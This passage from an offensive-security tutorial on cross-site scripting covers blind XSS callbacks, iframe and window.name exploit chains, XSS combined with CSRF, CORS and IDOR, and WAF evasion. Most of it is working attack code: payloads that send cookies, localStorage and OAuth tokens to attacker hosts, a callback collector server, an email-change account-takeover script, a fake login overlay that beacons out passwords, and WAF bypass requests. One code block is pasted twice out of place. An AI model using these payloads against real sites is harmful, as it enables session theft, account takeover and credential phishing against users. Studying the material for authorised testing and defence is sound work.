    // that block fetch/XHR, because img.src is rarely blocked)
    new Image().src = 'https://your-server.com/collect?' + 
        new URLSearchParams(data).toString();
    
    // Also try navigator.sendBeacon which works even as the page unloads
    navigator.sendBeacon('https://your-server.com/collect', JSON.stringify(data));
})();
  • XSSHunter is the canonical tool for blind XSS. It provides hosted infrastructure that captures callbacks with full page screenshots, cookie data, DOM content, and origin information. When a payload fires anywhere — even months after injection — XSSHunter records exactly what it found and sends you an email. Setting it up gives you a professional callback infrastructure without maintaining your own server. For self-hosted needs, you can use Caido's OOB features or a simple Express server with a /collect endpoint.

Why Blind XSS escalates to critical ?:

  • When a blind XSS fires in an admin panel, the stakes are completely different from a self-XSS. You're running JavaScript in the context of the highest-privilege user in the application.
  • From that vantage point, you can read all of the page's content (user data, configuration, internal notes), perform actions as the admin (create accounts, escalate privileges, delete data), extract the admin's session token from the page's requests, and potentially pivot to internal network resources that are accessible from the admin's browser but not from the public internet.
  • A blind XSS that fires in an admin panel is almost always a critical or high-severity finding. Bug bounty programs pay very well for these because the business impact — an attacker silently controlling the admin interface — is enormous.

Why It's Powerful ?:

  • Executes in admin panels (full application control)
  • Executes in internal tools (bypasses external WAFs)
  • Fires in support ticket systems (phish admins)
  • Long-time delayed (weeks later when audit log is reviewed)

Blind XSS Payload:

  • You need an out-of-band channel to prove execution:
// Minimal blind XSS callback payload:
<script>
new Image().src = 'https://your-collector.com/x?' + 
    encodeURIComponent(JSON.stringify({
        url: location.href,
        cookies: document.cookie,
        localStorage: JSON.stringify(localStorage),
        userAgent: navigator.userAgent,
        timestamp: new Date().toISOString()
    }));
</script>

xsshunter.com / Custom Collector Setup:

  • Professional bug hunters set up XSS callback collectors. Here's a minimal Node.js collector:
const express = require('express');
const app = express();

app.get('/x', (req, res) => {
    console.log('[BLIND XSS FIRED]');
    console.log('  URL:', req.query.url);
    console.log('  Cookies:', req.query.cookies);
    console.log('  IP:', req.ip);
    console.log('  User-Agent:', req.headers['user-agent']);
    
    // Respond with 1x1 transparent PNG to avoid errors
    res.set('Content-Type', 'image/png');
    res.set('Access-Control-Allow-Origin', '*');
    res.end(Buffer.from([0x89,0x50,0x4E,0x47,...]));
});

app.listen(443);

Payload Injection Points for Blind XSS:

User registration: First name, Last name, Username, Bio
Profile fields: Job title, Company, Phone, Address
Feedback forms: Message, Subject, Issue description
E-commerce: Order notes, Shipping instructions, Product reviews
Support tickets: Issue description, Steps to reproduce
User-Agent header: Viewable in analytics dashboards
Referer header: Server access logs shown in admin panels
X-Forwarded-For: Shown in server logs (IP spoofing)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 11: JavaScript Sandbox Escapes

Beyond template engine sandboxes, browsers themselves implement isolation boundaries — the same-origin policy for iframes, sandboxed iframe restrictions, and the distinction between different browsing contexts. Understanding how JavaScript code running in one context can affect or escape to another is important for chaining exploits.

The iframe inheritance model:

  • When you create an iframe with about:blank as its source, the new frame inherits the origin of its parent. This means that JavaScript running in that about:blank iframe is same-origin with the parent and can read and write to the parent's DOM. This is sometimes used as a technique in exploit chains — you create a child frame, write HTML into it, and use it as a staging area for further execution, because the parent's CSP might not apply uniformly to the child.
// Creating an about:blank iframe that inherits parent origin
const frame = document.createElement('iframe');
frame.src = 'about:blank';
document.body.appendChild(frame);

// Writing to the child frame — it's same-origin, so this works
frame.contentDocument.write('<script>alert(document.domain)</script>');

The srcdoc attribute:

  • An iframe's srcdoc attribute lets you specify the full HTML content of the frame as an attribute value. The resulting frame is same-origin with the parent.
  • This is relevant for CSP bypasses — some CSP configurations block inline scripts on the main page but don't restrict what happens inside a srcdoc iframe.
<!-- Normal iframe — loads a URL, document gets that URL's origin -->
<iframe src="https://example.com/child.html"></iframe>

<!-- srcdoc iframe — content is the attribute value, origin is parent's origin -->
<iframe srcdoc="<h1>Hello</h1><script>alert(document.domain)<\/script>"></iframe>

The window.name persistence:

  • The window.name property persists across navigations within the same tab — it survives even when you navigate to a completely different origin. This creates a cross-origin data channel: a page at evil.com can set window.name to a long string of data, then navigate the tab to victim.com.
  • If victim.com reads window.name and sinks it into the DOM, that's a cross-origin DOM XSS via the window.name source. It's a relatively rare source that many scanners miss.
<!-- evil.com/attack.html -->
<!DOCTYPE html>
<html>
<body>
<script>
    // Set window.name to the XSS payload
    // This string will survive the upcoming navigation to victim.com
    window.name = '<img src=x onerror="fetch(\'https://evil.com/collect?c=\'+document.cookie)">';
    
    // Now navigate the same tab to victim.com
    // The key: we're navigating, not opening a new tab
    // window.name persists through navigation of the same browsing context
    location.href = 'https://victim.com/dashboard';
    
    // After this navigation completes:
    // - The document changes from evil.com to victim.com
    // - The origin changes from evil.com to victim.com
    // - BUT window.name remains our payload string
</script>
</body>
</html>

Full Exploit chain:

Step 1 — Use HTML injection to inject a srcdoc iframe:

Your HTML injection payload:

<iframe srcdoc="
    <script>
        top.location = 'https://evil.com/set-name?return=' + 
                       encodeURIComponent(top.location.href);
    </script>
"></iframe>
  • Wait — the parent CSP blocks inline scripts. Does srcdoc inherit this restriction? In the specific browser version you're targeting, the srcdoc frame's inline script is blocked by the inherited CSP.
  • So you try a different approach — use srcdoc to inject a <meta> redirect, which doesn't require script execution:
<iframe srcdoc="
    <meta http-equiv='refresh' content='0;url=https://evil.com/set-name'>
"></iframe><!-- evil.com/set-name.html -->
<script>
    // We're in an iframe — set THIS frame's window.name
    window.name = '<img src=x onerror="navigator.sendBeacon(\'https://evil.com/c\',document.cookie)">';
    
    // Navigate this frame back to victim.com
    // window.name persists through this navigation
    location.href = 'https://victim.com/dashboard';
</script>
  • <meta refresh> is not a script — it's an HTML directive. The CSP script-src doesn't restrict it. The hidden iframe navigates to evil.com/set-name.

Step 2 — evil.com/set-name sets window.name and redirects back:

<!-- evil.com/set-name.html -->
<script>
    // We're in an iframe — set THIS frame's window.name
    window.name = '<img src=x onerror="navigator.sendBeacon(\'https://evil.com/c\',document.cookie)">';
    
    // Navigate this frame back to victim.com
    // window.name persists through this navigation
    location.href = 'https://victim.com/dashboard';
</script>

Step 3 — The iframe returns to victim.com with the poisoned window.name:

  • Now we have an iframe on victim.com's page where window.name is the XSS payload. If victim.com's initialization code reads window.name and sinks it, the XSS fires. But remember — the main page's window.name is clean. Only the iframe's window.name is poisoned.
  • So the target code must be one that runs in the iframe context, or the exploit chain needs another step. This is where about:blank can come in — if the XSS fires in the iframe (which is now victim.com origin), it can access parent.document and parent.localStorage because parent and iframe are same-origin.
  • The key insight: These three techniques — about:blank inheritance, srcdoc CSP interaction, and window.name persistence — are not independent tricks. They're primitives that compose. A chain might use srcdoc to escape a CSP restriction, window.name to smuggle a payload across an origin boundary, and about:blank to execute code in a same-origin context that has access to the parent's sensitive data. When you understand each primitive at the mechanism level, you can compose them situationally based on what the target allows and restricts.
  • That compositional thinking — taking a set of primitives and combining them to achieve an objective that none of them can achieve alone — is the core intellectual skill of advanced offensive security research. Every technique in this curriculum is a primitive. Learning to chain them is what makes you dangerous.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 12: Chaining XSS with Other Vulnerabilities

XSS alone is powerful, but XSS as the first link in a multi-vulnerability chain is where truly critical findings are built. Understanding how to chain vulnerabilities requires understanding what XSS gives you (same-origin JavaScript execution in a victim's browser) and what you still need (actions that require other users' identities or access to resources outside the victim's accessible scope).

Chain 1: XSS + CSRF

  • Cross-Site Request Forgery is a vulnerability where an attacker's page causes a victim's browser to make an authenticated request to a target site. CSRF defenses typically involve a CSRF token — a secret value embedded in forms that the attacker cannot read cross-origin due to the Same-Origin Policy.
  • XSS completely bypasses CSRF tokens. Since your JavaScript runs same-origin, you can read CSRF tokens directly from the DOM and include them in forged requests. The attack flow looks like this: the attacker injects a stored XSS payload into the target application. When the victim loads the page, the XSS fires. The JavaScript reads the CSRF token from the page using document.querySelector('input[name="csrf_token"]').value. It then constructs a fetch() request to a sensitive endpoint (change email, change password, make a payment) that includes both the victim's session cookie (automatically attached by the browser) and the CSRF token. The request looks entirely legitimate to the server.
// XSS payload that chains with CSRF to change the victim's email
(async function() {
    // Step 1: Load the account settings page to extract the CSRF token
    const settingsPage = await fetch('/account/settings', {
        credentials: 'include'  // Include session cookies
    });
    const html = await settingsPage.text();
    
    // Step 2: Parse the CSRF token from the page
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    const csrfToken = doc.querySelector('input[name="_csrf"]').value;
    
    // Step 3: Submit the email change with the victim's session and CSRF token
    await fetch('/account/change-email', {
        method: 'POST',
        credentials: 'include',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: `email=attacker@evil.com&_csrf=${csrfToken}`
    });
    
    // Step 4: Trigger a password reset to the attacker-controlled email
    await fetch('/account/forgot-password', {
        method: 'POST',
        credentials: 'include',
        body: `email=attacker@evil.com`
    });
})();
  • This is a full account takeover in four steps, entirely automated, executed in the victim's browser without any visible indication that anything happened.
  • Example 2:
// Step 1: Fetch the page to get the CSRF token
fetch('/account/settings')
    .then(r => r.text())
    .then(html => {
        // Parse CSRF token from DOM
        const parser = new DOMParser();
        const doc = parser.parseFromString(html, 'text/html');
        const token = doc.querySelector('input[name=csrf_token]').value;
        
        // Step 2: Submit the action with the valid CSRF token
        return fetch('/account/change-email', {
            method: 'POST',
            headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
            body: `email=attacker@attacker.com&csrf_token=${token}`,
            credentials: 'include'
        });
    });

Chain 2: XSS + CORS Misconfiguration

  • If victim.com has Access-Control-Allow-Origin: * or Access-Control-Allow-Origin: attacker.com:
// From victim.com (via XSS), call internal APIs:
fetch('https://internal-api.victim.com/admin/users', {
    credentials: 'include'
})
.then(r => r.json())
.then(data => {
    fetch('https://attacker.com/collect?d=' + btoa(JSON.stringify(data)));
});

Chain 3: XSS + Self-XSS Upgrade via CSRF

If only self-XSS is found (user can only XSS themselves):

  • Find CSRF vulnerability in profile update
  • Use CSRF to force victim to update their own profile with XSS payload
  • When victim views their profile — XSS fires
  • Self-XSS upgraded to persistent XSS via CSRF

Chain 4: XSS + OAuth Token Theft

// Application stores OAuth access token in localStorage:
const token = localStorage.getItem('access_token');

// XSS payload exfiltrates it:
fetch('https://attacker.com/steal?t=' + localStorage.getItem('access_token'));

// Now attacker calls API directly with stolen token:
// GET /api/user/profile
// Authorization: Bearer <stolen_token>

Chain 5: XSS → Phishing via Full Page Control

  • An XSS payload can inject arbitrary HTML and CSS into a page, overlaying it entirely. A sophisticated payload might hide the current page's content and display a convincing "session expired, please log in" modal that posts credentials to an attacker-controlled server. The victim is on the legitimate domain (bank.com), the URL bar shows the legitimate domain, the page looks legitimate — but the form is controlled by the attacker.
// XSS payload that injects a credential phishing overlay
const overlay = document.createElement('div');
overlay.style.cssText = `
    position: fixed; top: 0; left: 0; width: 100%; height: 100%;
    background: rgba(255,255,255,0.98); z-index: 999999;
    display: flex; align-items: center; justify-content: center;
`;
overlay.innerHTML = `
    <div style="max-width:400px; padding:40px; box-shadow:0 4px 20px rgba(0,0,0,0.15); border-radius:8px;">
        <h2 style="margin-top:0;">Session Expired</h2>
        <p>Please re-enter your credentials to continue.</p>
        <form id="phishForm">
            <input type="text" placeholder="Username" style="width:100%; margin:8px 0; padding:10px; box-sizing:border-box;"><br>
            <input type="password" placeholder="Password" style="width:100%; margin:8px 0; padding:10px; box-sizing:border-box;"><br>
            <button type="submit" style="width:100%; padding:12px; background:#0066cc; color:white; border:none; border-radius:4px; cursor:pointer;">
                Sign In
            </button>
        </form>
    </div>
`;
document.body.appendChild(overlay);

// Intercept form submission and exfiltrate credentials
overlay.querySelector('#phishForm').addEventListener('submit', function(e) {
    e.preventDefault();
    const [user, pass] = overlay.querySelectorAll('input');
    // Exfiltrate to attacker server
    navigator.sendBeacon('https://evil.com/creds', JSON.stringify({
        site: location.hostname,
        username: user.value,
        password: pass.value
    }));
    overlay.remove(); // Remove the overlay — victim thinks login succeeded
});
  • Example 2:
// Replace entire page content:
document.body.innerHTML = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999;background:white">
  <h1>Session Expired</h1>
  <p>Please enter your credentials to continue:</p>
  <form action="https://attacker.com/phish" method="POST">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <button type="submit">Login</button>
  </form>
</div>`;

Chain 6: XSS + IDOR → Reading or Modifying Other Users' Data

  • An Insecure Direct Object Reference vulnerability means the server doesn't verify that the requesting user has permission to access a resource — it just serves it if you know the ID.
  • Normally, discovering an IDOR requires being able to make requests with specific IDs and read the responses, which the SOP blocks for cross-origin requests. But XSS eliminates this barrier.
  • If you have stored XSS on a platform where users have profile IDs, and you know (or can enumerate) the ID of a target user — say an admin — your XSS payload can make authenticated same-origin fetch requests to /api/users/ADMIN_ID/profile, read the response (because same-origin), and exfiltrate the data. The SOP doesn't protect same-origin reads. IDOR without XSS is medium severity. IDOR plus XSS can become critical.

Chain 7: XSS → Full Account Takeover via Session Hijacking

  • The direct path to account takeover is session cookie theft, but HttpOnly blocks document.cookie for session cookies in well-configured applications. The workaround is not to steal the cookie but to steal a session-equivalent value that the application uses.
  • Many applications include an API token or Bearer token in their JavaScript's localStorage — and localStorage is not protected by HttpOnly. Your XSS payload reads localStorage.getItem('authToken') or iterates all localStorage keys, exfiltrates the token, and the attacker uses it directly in API requests from their own machine with Authorization: Bearer <stolen_token>. The session is taken over without ever needing the cookie.
  • For applications that use httpOnly cookies exclusively and have no alternative session values in storage, the XSS-to-takeover path goes through action-based takeover (like the CSRF chain above) — changing the email and resetting the password — rather than direct credential theft.

Chain 8: XSS → Internal Network Pivoting via fetch()

  • This is one of the most underappreciated capabilities of browser-based XSS. The victim's browser has access to internal network resources that the attacker does not — internal admin panels, development servers, internal APIs, IoT devices on the local network, router admin interfaces.
  • The victim's browser can reach http://192.168.1.1 (their router). The attacker's server cannot.
  • An XSS payload can use the victim's browser as a proxy to probe internal resources. The payload makes fetch() requests to internal IP ranges, reads the responses (same-origin SOP doesn't apply because the requests go to different origins — but you can read the response metadata: status codes, response headers, and error types reveal which ports are open), and exfiltrates what it discovers.
  • This turns browser-based XSS into a network reconnaissance tool against targets that are inaccessible from the public internet.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 13: WAF Fingerprinting and Evasion

A Web Application Firewall sits between the client and the server, inspecting HTTP requests and blocking those that match attack signatures. Most WAF evasion relies on the same fundamental principle as filter bypass: find the gap between what the WAF considers malicious and what the backend parser considers executable. That gap is your payload space.

Fingerprinting the WAF:

  • Before you try to evade a WAF, you need to know what you're dealing with. Different WAFs have different signature sets, different blocking behaviors, and different blind spots. The fingerprint comes from observing how the WAF responds to known-bad inputs.
  • Inject an obviously malicious string like <script>alert(1)</script> and observe the response. A WAF block typically manifests as a specific HTTP status code (403 is common, but some WAFs use 200 with a block page, 406, or even 501), a distinctive response body ("Forbidden by WAF", "Access Denied", a Cloudflare interstitial), or distinctive response headers (X-Sucuri-ID, X-WAF-Event-Info, the Server header changing to Cloudflare, etc.). Once you know which WAF you're dealing with — Cloudflare, Akamai, AWS WAF, ModSecurity, Imperva — you can research its known bypass techniques.

1. Chunked Transfer Encoding:

  • HTTP supports chunked transfer encoding, where the request body is sent in pieces with each piece prefixed by its length in hex.
  • Some WAFs inspect the request body as it arrives in chunks and don't reassemble it before pattern matching.
  • The backend server, however, reassembles the chunks into the complete payload before processing. This discrepancy can allow an attacker to split a malicious string across chunk boundaries in a way that no individual chunk triggers the WAF signature, but the reassembled payload is intact.
POST /search HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

7
q=<scr
4
ipt>
9
alert(1)
9
</script>
0
  • Not all WAFs are vulnerable to this, and not all backends support chunked encoding for all endpoints, but it's worth testing in content types that accept a body.

2. HTTP Parameter Pollution:

  • Many WAFs inspect the value of the q parameter in a request. If you send the same parameter twice, the WAF might inspect the first occurrence while the backend uses the last (or concatenates them, depending on the framework). This is HTTP Parameter Pollution (HPP):
GET /search?q=safe&q=<script>alert(1)</script>
  • If the WAF only checks the first q value and the backend's framework uses the last, your payload bypasses the inspection. The behavior is highly framework-dependent — PHP uses the last value, Node's querystring module uses the last, Express depends on configuration, Java Servlet uses the first — so you need to understand the target's backend stack.

3. Charset Confusion:

  • Some WAFs decode request content using a default character encoding (usually UTF-8) before pattern matching. If you specify a different charset in the Content-Type header, the backend might decode the content differently than the WAF did.
  • Historical examples involved UTF-16 or IBM EBCDIC encoded bodies where the WAF saw garbled bytes but the backend decoded them correctly. Modern WAFs are better at this, but charset confusion still surfaces in complex environments where different components have different encoding assumptions.
# Send JSON but claim form-encoded (or vice versa)
# WAF may parse as JSON, application may parse differently
POST /comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded

{"text":"<script>alert(1)</script>"}

4. Comment Insertion in JavaScript Context:

  • JavaScript ignores /* */ block comments and // line comments. In a JavaScript string context injection, you can sometimes insert comments within your payload to break up signature strings:
// These are all equivalent in JavaScript
alert(1)
al/**/ert(1)
al\u0065rt(1)     // Unicode escape in identifier
a\u006cert(1)
['ale'+'rt'][0](1)
window['al'+'ert'](1)
  • The string alert might be in a WAF's signature. The versions above are not the literal string alert but evaluate identically. Similarly, HTML comments within certain HTML parsing contexts can break up tag patterns that WAF signatures look for.

5. Path Confusion:

  • Some WAFs apply different inspection profiles to different URL paths. A path like /api/v2/search might get a lighter inspection than /login. Testing your payloads across multiple endpoint paths on the same application can reveal inconsistent WAF enforcement.

Concrete Scenario:

  • Let's say you're testing a fintech application. The application has the following URL structure:
/login                          → Authentication endpoint
/api/v2/search                  → Product/account search
/api/v2/transactions            → Transaction history
/api/v2/support/submit          → Support ticket submission
/static/                        → CSS, JS, images
/docs/                          → API documentation pages
  • The company uses a commercial WAF. The WAF operator has configured inspection profiles like this — though you can't see this directly, you're going to infer it through testing:
/login              → STRICT   (SQLi, XSS, brute force detection, everything)
/api/v2/search      → STANDARD (common SQLi and XSS signatures)
/api/v2/support/    → STANDARD
/static/            → NONE     (performance optimization — it's just files)
/docs/              → MINIMAL  (just block obviously malicious stuff)

Phase 1 — Establishing the Baseline Behavior:

  • You start by sending an obviously malicious payload to a known-strict endpoint. The canonical test payload is something that every WAF on earth blocks:
POST /login HTTP/1.1
Host: fintech.com
Content-Type: application/x-www-form-urlencoded

username=<script>alert(1)</script>&password=test

Response:

HTTP/1.1 403 Forbidden
X-Firewall-Rule: XSS-001
Content-Type: text/html

<html>Request blocked by security policy.</html>
  • Good. You've confirmed the WAF is active, you know what a block looks like (403 with X-Firewall-Rule header), and you know the login endpoint is under strict inspection. This is your baseline.

Now you send the exact same payload to the search endpoint:

GET /api/v2/search?q=<script>alert(1)</script> HTTP/1.1
Host: fintech.com
Cookie: session=yourvalidtoken

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"results": [], "query": "<script>alert(1)</script>", "count": 0}
  • The WAF passed it. The application received the payload, processed it, and returned it in the JSON response. The WAF's inspection profile for /api/v2/search either doesn't include XSS rules, or includes only a subset that this payload bypassed. You've just discovered your first inconsistency.
  • But you need to be careful about what you've actually proven. The application returned the payload in a JSON response body with Content-Type: application/json.
  • The browser won't execute that as HTML — JSON responses aren't parsed as HTML documents. So this specific reflection isn't exploitable yet. What you've confirmed is that the WAF is not inspecting this path with the same rules as /login.
  • That's the valuable discovery. Now you need to find a reflection context in this path family that actually results in execution.

Phase 2 — Mapping the Inconsistency Across Paths:

  • You now systematically test every path you've enumerated with the same baseline payload, recording the response for each:
/login                    → 403 (WAF blocks)
/api/v2/search            → 200 (WAF passes)
/api/v2/transactions      → 200 (WAF passes)  
/api/v2/support/submit    → 200 (WAF passes)
/static/app.js            → 200 (WAF passes — expected, it's a file)
/docs/getting-started     → 200 (WAF passes)
  • Every API path under /api/v2/ passes the payload through. You now have a clear picture: the WAF applies strict XSS inspection only to /login. Everything else is under lighter inspection or uninspected entirely.
  • Now you refine your testing. The search path reflected your payload in JSON, which wasn't directly exploitable. But is there another endpoint under /api/v2/ that reflects input into an HTML context? You look at the support ticket submission endpoint, because support ticket systems frequently generate HTML emails or HTML-rendered ticket views.
POST /api/v2/support/submit HTTP/1.1
Host: fintech.com
Content-Type: application/json
Cookie: session=yourvalidtoken

{
    "subject": "Test ticket",
    "message": "<script>alert(document.domain)</script>"
}

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"ticket_id": "TKT-4821", "status": "submitted"}
  • The WAF passed it. Now you visit the ticket in the customer portal and look at how it renders. If the portal renders ticket content as HTML rather than plain text, you have stored XSS through a path the WAF doesn't inspect with XSS rules — even though the login path directly above it in the same application is fully protected.

Phase 3 — Understanding Why the Gap Exists:

  • The gap exists for a precise reason that's worth articulating. WAF rules are applied based on the URL path prefix matched against a policy table. The policy table looks something like this internally:
Rule Priority    Path Pattern       Profile Applied
1               /login             STRICT_AUTH
2               /admin/*           STRICT_ADMIN  
3               /api/v2/*          API_STANDARD
4               /static/*          NONE
5               /*                 DEFAULT
  • The WAF operator made a decision: the API endpoints receive API_STANDARD inspection rather than full XSS inspection. The reasoning might have been that API endpoints return JSON, not HTML, so XSS rules are irrelevant. That reasoning is flawed in two ways.
  • First, it assumes all API endpoints always return JSON. But your support endpoint stores the input and renders it later in an HTML context — the HTML rendering happens at the portal layer, which serves from /portal/tickets/TKT-4821, a different path that might have HTML inspection. But the storage happened via the API path, which is under lighter inspection. The injection and the rendering happen through different paths, and the WAF's path-based model doesn't account for this.
  • Second, even endpoints that return JSON can have their output embedded in HTML by a JavaScript frontend that uses innerHTML to render server responses — the DOM XSS scenario. The WAF's assumption that "JSON context means no XSS risk" is wrong for any application with a rich JavaScript frontend.

Phase 4 — Escalating From Discovery to Exploitation:

  • Now let's say the stored XSS in the support ticket isn't accessible to you directly — you submitted the ticket, it goes to a support agent's admin panel, and you can't see that panel. You've established blind XSS potential. But let's pursue a different angle.
  • You notice the docs endpoint also passed the payload. You look at the documentation system more carefully. It's a documentation platform where the company can embed code examples. You find a search feature within the docs:
GET /docs/search?query=<img src=x onerror=alert(document.domain)> HTTP/1.1
Host: fintech.com
  • The WAF passes this. The docs search page returns:
HTTP/1.1 200 OK
Content-Type: text/html

<html>
<body>
    <h2>Search Results for: <img src=x onerror=alert(document.domain)></h2>
    <div class="results">No results found.</div>
</body>
</html>
  • This is reflected XSS. The response is text/html. The browser will parse it. The <img> tag will be created, src=x will fail to load, and onerror=alert(document.domain) will fire. The WAF blocked the same payload on /login but passed it here because /docs/* has minimal inspection.
  • The business impact might seem lower because /docs/ is a documentation page rather than a financial dashboard. But the domain is fintech.com. JavaScript executing there has the same origin as the entire application. Depending on whether the documentation portal shares cookies with the main application, the attacker can potentially steal session tokens that work across the whole domain.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

None
Thank's For Reading std::cout << "Friend" << std::endl;

TECHNIQUES COVERED

1. Reflected XSS: Input submitted in a request is reflected in the immediate response without storage. Requires the victim to click a crafted link. The payload exists only in the URL — not stored anywhere on the server.

2. Stored XSS: Input is saved to the server (database, file, log) and later rendered to other users. No link delivery needed — the payload executes for every user who loads the affected page. Higher impact than reflected due to reach and persistence.

3. DOM-based XSS: The server is uninvolved. A client-side script reads from an attacker-controlled source (URL hash, window.name, postMessage) and writes it to a DOM sink (innerHTML, eval). Never appears in the HTTP response — invisible to server-side scanners.

4. Blind XSS: A stored XSS that fires in a context the attacker can't directly observe — typically an admin panel, email renderer, or internal tool. Requires a callback payload that exfiltrates data to an attacker-controlled server when it fires.

5. Mutation XSS (mXSS): Exploits the difference between how a sanitizer parses HTML and how the browser re-parses the sanitizer's output. A payload that's safe after one parse round becomes dangerous after serialization and re-parsing. Targets sanitizer libraries that use innerHTML round-trips.

6. DOM Clobbering: Uses HTML injection (not JavaScript) to overwrite global JavaScript variables by creating elements whose id or name attributes match variable names the application's code references. Can create XSS from HTML-only injection.

7. Prototype Pollution → XSS: Injects properties into Object.prototype via a vulnerable deep merge or assignment function. Downstream library code that reads those properties and sinks them into the DOM produces XSS. The injection and execution are in different code paths.

8. Polyglot Payloads: Single strings crafted to execute in multiple injection contexts simultaneously — HTML body, quoted attribute, JavaScript string, URL context. Used diagnostically to determine which context your input lands in, and offensively against applications where the context is ambiguous.

9. Client-Side Template Injection (CSTI): User input is evaluated as a template expression by a client-side framework (AngularJS, Vue). The template engine's expression evaluator executes the attacker's input as code. Detected by injecting {{7*7}} and observing whether the page renders 49.

10. Filter Bypass — Case Variation: HTML tag names and event handler attribute names are case-insensitive. <ScRiPt>, <SCRIPT>, OnErRoR all work identically to their lowercase versions. Bypasses naive filters that only check for the lowercase form.

11. Filter Bypass — Tag Substitution: Replaces blocked tags (<script>) with alternative execution vectors (<svg onload>, <img onerror>, <input autofocus onfocus>, <details ontoggle>). Exploits incomplete tag blocklists that focus on obvious tags and miss the broader execution surface.

12. Filter Bypass — Encoding Tricks: Uses HTML entity encoding, URL encoding, Unicode escapes, or Base64 in data URIs to represent payload characters in forms the filter doesn't recognize. The browser's decoder runs after the filter, converting encoded characters back to their dangerous forms before parsing or execution.

13. Filter Bypass — Null Bytes: Inserts null bytes (\x00) within strings that some parsers treat as string terminators, splitting the payload in a way that confuses the filter while the HTML parser reconstructs the intended string.

13. Filter Bypass — Unusual Whitespace: Uses tab characters (\x09), newlines (\x0a), carriage returns (\x0d) within or between HTML tags and attributes. These are valid HTML whitespace but may not match filter patterns expecting standard spaces.

14. HTML Entity Encoding in Event Handlers: Encodes JavaScript payload characters as HTML entities within event handler attribute values. The HTML parser decodes entities before passing the attribute value to the JavaScript engine, so the JavaScript engine receives the decoded, executable code while the filter saw only harmless entity sequences.

15. SSR JSON Injection: Injects into server-side rendered JSON state blobs embedded in <script> tags. The </script> sequence closes the script block regardless of being inside a JSON string, allowing tag injection from JSON data. Fixed by escaping < as \u003c in SSR serializers.

16. javascript: URI Injection: Injects javascript:alert(1) into href, src, or action attributes that accept URLs. When the user clicks or the browser loads the URL, the JavaScript expression is evaluated in the page's context.

17. window.name XSS: Sets window.name to an XSS payload on an attacker-controlled page, then navigates or redirects to the victim application. The window.name value persists through the navigation. If the victim application reads window.name and sinks it into the DOM, XSS fires in the victim's origin.

18. srcdoc CSP Bypass: Uses the iframe srcdoc attribute to create a same-origin child frame whose content is specified inline. In some CSP configurations, inline scripts in srcdoc frames are not blocked by the parent's CSP, allowing script execution that the parent's script-src policy would otherwise prevent.

19. about:blank Origin Inheritance: Creates an about:blank iframe whose origin is inherited from the creator. JavaScript in this frame has full same-origin access to the parent. Used as a staging area for execution that may bypass certain CSP configurations or as a cross-frame DOM access mechanism.

20. Keylogger Injection: Adds an addEventListener('keydown', ...) handler to the document via XSS. Captures every keystroke including characters typed in password fields (the raw keydown event, not the input event value). Buffers captured keystrokes and exfiltrates them at intervals via navigator.sendBeacon.

21. Credential Phishing Overlay: Injects a full-page overlay via XSS that mimics the application's login interface. Because the overlay appears on the legitimate domain, the address bar shows the trusted URL. Captured credentials are posted to an attacker-controlled server. The overlay is removed after submission to avoid suspicion.

22. Cookie Exfiltration: Reads document.cookie via XSS and sends the value to an attacker-controlled server. Limited by the HttpOnly flag, which makes session cookies invisible to JavaScript. Bypassed by targeting localStorage tokens or using the session implicitly via authenticated API requests.

23. DNS Exfiltration: Encodes stolen data as subdomains of an attacker-controlled domain and triggers DNS lookups by loading resources from those subdomains. Bypasses CSPs that block all HTTP-based exfiltration channels, since DNS lookups are not governed by connect-src or img-src.

24. Internal Network Pivoting via fetch(): Uses the victim's browser as a proxy to make requests to internal network resources inaccessible from the public internet. The victim's browser can reach 192.168.x.x, internal admin panels, cloud metadata endpoints, and IoT devices on the local network. Port scanning is accomplished by observing timing and error type differences.

SECTION 10 — CSP BYPASS TECHNIQUES

1. JSONP Endpoint Bypass: Uses a JSONP endpoint hosted on a whitelisted script-src domain to execute arbitrary JavaScript. JSONP endpoints reflect a callback parameter name as a function call in their response — if the attacker controls the callback name, they control what JavaScript executes. The response is valid JavaScript served from a trusted domain, satisfying the CSP.

2. Open Redirect in Whitelisted Domain: Exploits an open redirect on a CSP-whitelisted domain to deliver an external script. The CSP allows the initial request to the trusted domain; the redirect delivers attacker-controlled content.

3. base-uri Missing Bypass: Injects <base href="https://attacker.com/"> when the CSP lacks a base-uri directive. Causes all relative URLs on the page to resolve against the attacker's domain, redirecting relative script loads to attacker-controlled servers even under a script-src 'self' policy.

4. Script Gadgets: Manipulates existing, nonce-bearing scripts on the page through DOM injection rather than injecting new scripts. Injects HTML that triggers behavior in trusted scripts — Angular template expressions, data attributes read by trusted scripts — to execute attacker-controlled code without needing a new script tag.

5. form-action Missing Bypass: When form-action is absent from the CSP, injects a modified form action pointing to an attacker-controlled server. Harvests submitted form data (credentials, payment information) even when JavaScript execution is blocked by other CSP directives.

6. Nonce Extraction: Reads an existing nonce value from a legitimate script tag via document.querySelector('script[nonce]').nonce and uses it on subsequently injected script tags. Requires some JavaScript execution first — used to escalate limited execution to full CSP bypass.

7. Unsafe-inline Detection: The trivial bypass — checks whether script-src includes 'unsafe-inline', which allows all inline scripts and event handlers, completely negating CSP protection against XSS. The first thing to check in any CSP.

SECTION 11 — WAF EVASION TECHNIQUES

1. Chunked Transfer Encoding Bypass: Splits a malicious payload across multiple HTTP transfer-encoding chunks so that no individual chunk triggers WAF signatures. The backend reassembles the chunks into the complete payload. Exploits WAFs that inspect chunks individually rather than the reassembled body.

2. HTTP Parameter Pollution (HPP): Sends the same parameter multiple times in a request. Exploits discrepancies between how the WAF reads parameter values (often the first occurrence) and how the backend framework processes them (often the last occurrence, or a concatenation). Hides payloads in parameter positions the WAF doesn't inspect.

